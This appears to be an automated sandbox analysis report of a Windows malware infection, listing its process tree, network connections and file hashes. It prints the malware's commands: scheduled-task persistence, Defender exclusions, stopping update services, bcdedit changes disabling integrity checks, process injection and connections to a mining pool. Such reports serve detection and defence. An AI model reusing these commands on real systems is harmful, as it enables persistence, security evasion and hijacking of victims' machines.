PID 2640 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\870B.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe
PID 2640 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\870B.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe
PID 2640 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\870B.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe
PID 2640 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\870B.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe
PID 2640 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\870B.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe
PID 2640 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\870B.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe
PID 1268 wrote to memory of 2532 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8882.exe
PID 1268 wrote to memory of 2532 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8882.exe
PID 1268 wrote to memory of 2532 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8882.exe
PID 1268 wrote to memory of 2532 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8882.exe
PID 2544 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe
PID 2544 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe
PID 2544 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe
PID 2544 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe
PID 2544 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe
PID 2544 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe
PID 2544 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe
PID 2580 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PJ9VB9fv.exe
PID 2580 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PJ9VB9fv.exe
PID 2580 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PJ9VB9fv.exe
PID 2580 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PJ9VB9fv.exe
PID 2580 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PJ9VB9fv.exe
PID 2580 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PJ9VB9fv.exe
PID 2580 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PJ9VB9fv.exe
PID 1268 wrote to memory of 3012 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\893E.bat

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe

"C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 36

C:\Users\Admin\AppData\Local\Temp\870B.exe

C:\Users\Admin\AppData\Local\Temp\870B.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe

C:\Users\Admin\AppData\Local\Temp\8882.exe

C:\Users\Admin\AppData\Local\Temp\8882.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\IS2mS9Rs.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\IS2mS9Rs.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8A74.tmp\8A75.tmp\8A76.bat C:\Users\Admin\AppData\Local\Temp\893E.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 132

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ov99zg1.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ov99zg1.exe

C:\Users\Admin\AppData\Local\Temp\893E.bat

"C:\Users\Admin\AppData\Local\Temp\893E.bat"

C:\Users\Admin\AppData\Local\Temp\8CF7.exe

C:\Users\Admin\AppData\Local\Temp\8CF7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1072 -s 280

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PJ9VB9fv.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PJ9VB9fv.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Users\Admin\AppData\Local\Temp\8FE5.exe

C:\Users\Admin\AppData\Local\Temp\8FE5.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1884 CREDAT:340993 /prefetch:2

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 132

C:\Users\Admin\AppData\Local\Temp\93CC.exe

C:\Users\Admin\AppData\Local\Temp\93CC.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1540 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\B715.exe

C:\Users\Admin\AppData\Local\Temp\B715.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\BD7C.exe

C:\Users\Admin\AppData\Local\Temp\BD7C.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 524

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\C579.exe

C:\Users\Admin\AppData\Local\Temp\C579.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2848 -s 512

C:\Users\Admin\AppData\Local\Temp\C922.exe

C:\Users\Admin\AppData\Local\Temp\C922.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231010200520.log C:\Windows\Logs\CBS\CbsPersist_20231010200520.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {07BAFA54-9549-4E3A-A297-41EF4D8A6934} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\system32\taskeng.exe

taskeng.exe {23693805-55F8-463F-A2C1-01095567B2FF} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "2020787883-8002581917137377462041173031397077429-19898306701975365473-927943743"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "491818800-13962282911171040984-291235870928581424-161727336-428707785-852547404"

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "6496975904084632912107730333-799478743555737020-1124349948964253713-878661907"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
RU 5.42.65.80:80 5.42.65.80 tcp
NL 142.250.179.131:443 tcp
NL 142.250.179.131:443 tcp
NL 142.250.179.131:443 tcp
NL 157.240.247.35:443 tcp
US 8.8.8.8:53 accounts.youtube.com udp
US 173.194.69.138:443 accounts.youtube.com tcp
US 173.194.69.138:443 accounts.youtube.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.35:443 facebook.com tcp
CZ 157.240.30.35:443 facebook.com tcp
NL 157.240.247.35:443 tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 e4aa001f-e472-477d-8a00-bb19161d03e8.uuid.cdntokiog.studio udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
CZ 157.240.30.35:443 fbcdn.net tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 fbsbx.com udp
CZ 157.240.30.35:443 fbsbx.com tcp
CZ 157.240.30.35:443 fbsbx.com tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
FI 77.91.124.1:80 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
NL 142.250.179.131:443 tcp
NL 142.250.179.131:443 tcp
NL 142.250.179.131:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 212.47.253.124:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
FR 51.255.34.118:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 104.21.61.162:80 tcp
US 104.21.61.162:80 tcp
US 104.21.61.162:80 tcp
US 8.8.8.8:53 server5.cdntokiog.studio udp
US 8.8.8.8:53 stun.stunprotocol.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
BG 185.82.216.49:443 server5.cdntokiog.studio tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.0:443 walkinglate.com tcp
N/A 127.0.0.1:3478 udp

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe

MD5 d54e8d7604a377a7365eb2a9938e5bb3
SHA1 4b8b2b99a9686aaafe0573274abd942d39dd9a2b
SHA256 20beb8fbb0bfad1b4e83c8963f8faa13a0ae6c1cc9c2abc88784ed0dd4639be8
SHA512 8bf8aafc8d390d8759b64119921367e8f4a0fae6b88c5d08ba38a6b6eed14bd53c501d412b5afe2b66f9774f7020c3d4d1ca38130f13748314c0ee19cc132884

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe

MD5 d54e8d7604a377a7365eb2a9938e5bb3
SHA1 4b8b2b99a9686aaafe0573274abd942d39dd9a2b
SHA256 20beb8fbb0bfad1b4e83c8963f8faa13a0ae6c1cc9c2abc88784ed0dd4639be8
SHA512 8bf8aafc8d390d8759b64119921367e8f4a0fae6b88c5d08ba38a6b6eed14bd53c501d412b5afe2b66f9774f7020c3d4d1ca38130f13748314c0ee19cc132884

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe

MD5 d54e8d7604a377a7365eb2a9938e5bb3
SHA1 4b8b2b99a9686aaafe0573274abd942d39dd9a2b
SHA256 20beb8fbb0bfad1b4e83c8963f8faa13a0ae6c1cc9c2abc88784ed0dd4639be8
SHA512 8bf8aafc8d390d8759b64119921367e8f4a0fae6b88c5d08ba38a6b6eed14bd53c501d412b5afe2b66f9774f7020c3d4d1ca38130f13748314c0ee19cc132884

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe

MD5 d54e8d7604a377a7365eb2a9938e5bb3
SHA1 4b8b2b99a9686aaafe0573274abd942d39dd9a2b
SHA256 20beb8fbb0bfad1b4e83c8963f8faa13a0ae6c1cc9c2abc88784ed0dd4639be8
SHA512 8bf8aafc8d390d8759b64119921367e8f4a0fae6b88c5d08ba38a6b6eed14bd53c501d412b5afe2b66f9774f7020c3d4d1ca38130f13748314c0ee19cc132884

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe

MD5 9609b09ea71e8b93a28952593162aa93
SHA1 e1398b8d3cd91362d17488098858528d348a35e5
SHA256 d5063fedba3cd823ad9a1564da01554e540234f5d79435ef0f752c6029c490d1
SHA512 c688e5b24eb1add31b61fd605eefd67db66ab4bf7a9a77cd1d1d1fec3923459ace509aa22efe60d4a1723d663b52780a2b5737653538dcbc1353b388b6888c80

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe

MD5 9609b09ea71e8b93a28952593162aa93
SHA1 e1398b8d3cd91362d17488098858528d348a35e5
